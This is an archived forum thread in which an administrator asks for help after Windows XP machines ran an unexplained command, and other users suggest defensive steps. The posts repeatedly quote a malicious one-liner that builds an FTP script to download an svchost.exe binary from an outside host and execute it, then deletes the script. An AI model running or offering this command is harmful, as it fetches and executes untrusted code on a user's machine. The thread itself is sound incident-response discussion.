Jump to content

Virus Activity?

Guest ctowndu33

By Guest ctowndu33
in Windows XP

 Share

Recommended Posts

Guest ctowndu33

Guest ctowndu33

Posted
Posted

We had three users (all with XP SP2) that all of a sudden this morning had

their task manager open up along with a command prompt. In the command

prompt, a statement was input along the lines of the following....

 

cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o

&echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o

&svchost.exe

 

 

Anyone seen anything like this before? We haven't approved any Windows

Updates or anything like that (even though I wouldn't think that would have

anything to do with this). That is not a typo (above in the statement where

it says mircosoft password). Any help would be appreciated. We saw three at

the exact same time and then haven't seen anymore (we have about 100 Windows

XP SP2 machines).

 

Thanks in advance,

ctowndu33

  • Replies 6
  • Created
  • Last Reply

Popular Days

Popular Days

Guest Lanwench [MVP - Exchange]

Guest Lanwench [MVP - Exchange]

Posted
Posted

Re: Virus Activity?

 

ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

> We had three users (all with XP SP2) that all of a sudden this

> morning had their task manager open up along with a command prompt.

> In the command prompt, a statement was input along the lines of the

> following....

>

> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password

> >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F

> /Q o &svchost.exe

>

>

> Anyone seen anything like this before? We haven't approved any

> Windows Updates or anything like that (even though I wouldn't think

> that would have anything to do with this). That is not a typo (above

> in the statement where it says mircosoft password). Any help would

> be appreciated. We saw three at the exact same time and then haven't

> seen anymore (we have about 100 Windows XP SP2 machines).

>

> Thanks in advance,

> ctowndu33

 

What antivirus software do you use? What firewall protects your network? Is

the Windows firewall enabled on these machines? I would disconnect them from

the network immediately while you do some checking, although if your other

machines aren't sufficiently protected you may have other creepy crawlies on

the network.

Guest Mike Lowery

Guest Mike Lowery

Posted
Posted

Re: Virus Activity?

 

Looks suspicious. There are viruses that infect svchost.exe. Not sure what to

make of the commands though. "open" is not a Windows application or command and

"ms.microsoft.com" is registered to Microsoft. Of course they could have that

go anywhere if your hosts file was hacked.

 

"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message

news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...

> We had three users (all with XP SP2) that all of a sudden this morning had

> their task manager open up along with a command prompt. In the command

> prompt, a statement was input along the lines of the following....

>

> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o

> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o

> &svchost.exe

>

>

> Anyone seen anything like this before? We haven't approved any Windows

> Updates or anything like that (even though I wouldn't think that would have

> anything to do with this). That is not a typo (above in the statement where

> it says mircosoft password). Any help would be appreciated. We saw three at

> the exact same time and then haven't seen anymore (we have about 100 Windows

> XP SP2 machines).

>

> Thanks in advance,

> ctowndu33

Guest ctowndu33

Guest ctowndu33

Posted
Posted

Re: Virus Activity?

 

We for the most part are uptodate on Windows Updates. We are also uptodate

on our Symantec CE for the desktops (not my personal choice but everyone has

current definitions). We have a PIX in place, but our Windows Firewalls are

turned off. Since my post, I was told from one of our users that their

cursor moved. Now, the guy here before me deployed VNC through his image to

all the PCs. Since then, I have created a new image without VNC and in the

last 6 months, we have replaced about 1/2 of the computers. This was a great

excuse to go out and remove the rest of the installs. I can't imagine though

anyone that previously worked here connecting and trying to execute that

command.

 

"Lanwench [MVP - Exchange]" wrote:

> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

> > We had three users (all with XP SP2) that all of a sudden this

> > morning had their task manager open up along with a command prompt.

> > In the command prompt, a statement was input along the lines of the

> > following....

> >

> > cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password

> > >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F

> > /Q o &svchost.exe

> >

> >

> > Anyone seen anything like this before? We haven't approved any

> > Windows Updates or anything like that (even though I wouldn't think

> > that would have anything to do with this). That is not a typo (above

> > in the statement where it says mircosoft password). Any help would

> > be appreciated. We saw three at the exact same time and then haven't

> > seen anymore (we have about 100 Windows XP SP2 machines).

> >

> > Thanks in advance,

> > ctowndu33

>

> What antivirus software do you use? What firewall protects your network? Is

> the Windows firewall enabled on these machines? I would disconnect them from

> the network immediately while you do some checking, although if your other

> machines aren't sufficiently protected you may have other creepy crawlies on

> the network.

>

>

>

Guest Lenny

Guest Lenny

Posted
Posted

Re: Virus Activity?

 

fdisk and format and reinstall

 

 

 

"ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message

news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...

> We had three users (all with XP SP2) that all of a sudden this morning had

> their task manager open up along with a command prompt. In the command

> prompt, a statement was input along the lines of the following....

>

> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft password >> o

> &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o

> &svchost.exe

>

>

> Anyone seen anything like this before? We haven't approved any Windows

> Updates or anything like that (even though I wouldn't think that would

have

> anything to do with this). That is not a typo (above in the statement

where

> it says mircosoft password). Any help would be appreciated. We saw three

at

> the exact same time and then haven't seen anymore (we have about 100

Windows

> XP SP2 machines).

>

> Thanks in advance,

> ctowndu33

Guest Lanwench [MVP - Exchange]

Guest Lanwench [MVP - Exchange]

Posted
Posted

Re: Virus Activity?

 

ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

> We for the most part are uptodate on Windows Updates. We are also

> uptodate on our Symantec CE for the desktops (not my personal choice

> but everyone has current definitions).

 

Have you forced a full scan?

What about anti-malware/adware/spyware?

> We have a PIX in place, but

> our Windows Firewalls are turned off.

 

I'd change that (use group policy to manage it, as I expect you have AD).

You can set up exceptions as needed. Also, on your PIX, I'd deny all

outbound Internet access from the LAN IP range used by your workstations

except TCP 80 and 443, for starters - and remove your end users from the

local administrators groups.

> Since my post, I was told from

> one of our users that their cursor moved. Now, the guy here before

> me deployed VNC through his image to all the PCs. Since then, I have

> created a new image without VNC and in the last 6 months, we have

> replaced about 1/2 of the computers. This was a great excuse to go

> out and remove the rest of the installs. I can't imagine though

> anyone that previously worked here connecting and trying to execute

> that command.

 

Is VNC traffic even allowed inbound through your Pix? Close it, if so. What

exactly is open?

 

What you saw looks highly suspicious to me. Someone or something is trying

to run a telnet session for some reason. I can't find anything useful in

google, but you might post in microsoft.public.security for more expert

help.

 

 

 

 

>

> "Lanwench [MVP - Exchange]" wrote:

>

>> ctowndu33 <ctowndu33@discussions.microsoft.com> wrote:

>>> We had three users (all with XP SP2) that all of a sudden this

>>> morning had their task manager open up along with a command prompt.

>>> In the command prompt, a statement was input along the lines of the

>>> following....

>>>

>>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft

>>> password

>>>>> o &echo get svchost.exe >> o &echo quit >> o &ftp -n -s:o &del /F

>>> /Q o &svchost.exe

>>>

>>>

>>> Anyone seen anything like this before? We haven't approved any

>>> Windows Updates or anything like that (even though I wouldn't think

>>> that would have anything to do with this). That is not a typo

>>> (above in the statement where it says mircosoft password). Any

>>> help would be appreciated. We saw three at the exact same time and

>>> then haven't seen anymore (we have about 100 Windows XP SP2

>>> machines).

>>>

>>> Thanks in advance,

>>> ctowndu33

>>

>> What antivirus software do you use? What firewall protects your

>> network? Is the Windows firewall enabled on these machines? I would

>> disconnect them from the network immediately while you do some

>> checking, although if your other machines aren't sufficiently

>> protected you may have other creepy crawlies on the network.

Guest Lanwench [MVP - Exchange]

Guest Lanwench [MVP - Exchange]

Posted
Posted

Re: Virus Activity?

 

Lenny <here@there.com> wrote:

> fdisk and format and reinstall

 

That's pretty extreme!

 

>

>

>

> "ctowndu33" <ctowndu33@discussions.microsoft.com> wrote in message

> news:600CC05B-F956-46D5-9249-4359BF2F8766@microsoft.com...

>> We had three users (all with XP SP2) that all of a sudden this

>> morning had their task manager open up along with a command prompt.

>> In the command prompt, a statement was input along the lines of the

>> following....

>>

>> cmd /k echo open ms.microsoft.com 21 > o&echo user mircosoft

>> password >> o &echo get svchost.exe >> o &echo quit >> o &ftp -n

>> -s:o &del /F /Q o &svchost.exe

>>

>>

>> Anyone seen anything like this before? We haven't approved any

>> Windows Updates or anything like that (even though I wouldn't think

>> that would have anything to do with this). That is not a typo

>> (above in the statement where it says mircosoft password). Any help

>> would be appreciated. We saw three at the exact same time and then

>> haven't seen anymore (we have about 100 Windows XP SP2 machines).

>>

>> Thanks in advance,

>> ctowndu33

 Share
Go to topic listing
×
×
  • Create New...